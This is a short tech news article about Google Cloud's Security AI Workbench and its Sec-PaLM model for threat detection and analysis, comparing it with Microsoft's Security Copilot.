Google Cloud Introduces Security AI Workbench for Faster Threat Detection and Analysis
25.4.23 Security The Hacker News
Google's cloud division is following in the footsteps of Microsoft with the launch of Security AI Workbench that leverages generative AI models to gain better visibility into the threat landscape.
Powering the cybersecurity suite is Sec-PaLM, a specialized large language model (LLM) that's "fine-tuned for security use cases."
The idea is to take advantage of the latest advances in AI to augment point-in-time incident analysis, threat detection, and analytics to counter and prevent new infections by delivering intelligence that's trusted, relevant, and actionable.
To that end, the Security AI Workbench spans a wide range of new AI-powered tools, including VirusTotal Code Insight and Mandiant Breach Analytics for Chronicle, to analyze potentially malicious scripts and alert customers of active breaches in their environments.
Users, like with Microsoft's GPT-4-based Security Copilot, can "conversationally search, analyze, and investigate security data" with an aim to reduce mean time-to-respond as well as quickly determine the full scope of events.
Threat Detection and Analysis
On the other hand, the Code Insight feature in VirusTotal is designed to generate natural language summaries of code snippets so as to detect and mitigate potential threats. It can also be used to flag false negatives and clear false positives.
Another key offering is Security Command Center AI, which utilizes Sec-PaLM to provide operators with "near-instant analysis of findings and possible attack paths" as well as impacted assets and recommended mitigations.
Google is also making use of machine learning models to detect and respond to API abuse and business logic attacks, wherein an adversary weaponizes a legitimate functionality to achieve a nefarious goal without triggering a security alert.
"Because Security AI Workbench is built on Google Cloud's Vertex AI infrastructure, customers control their data with enterprise-grade capabilities such as data isolation, data protection, sovereignty, and compliance support," Google Cloud's Sunil Potti said.
The development comes days after Google announced the creation of a new unit called Google DeepMind that brings together its AI research groups from DeepMind and the Brain team from Google Research to "build more capable systems more safely and responsibly."
News of Google's Security AI Workbench also follows GitLab's plans to integrate AI into its platform to help developers from leaking access tokens and avoid false positives during security testing.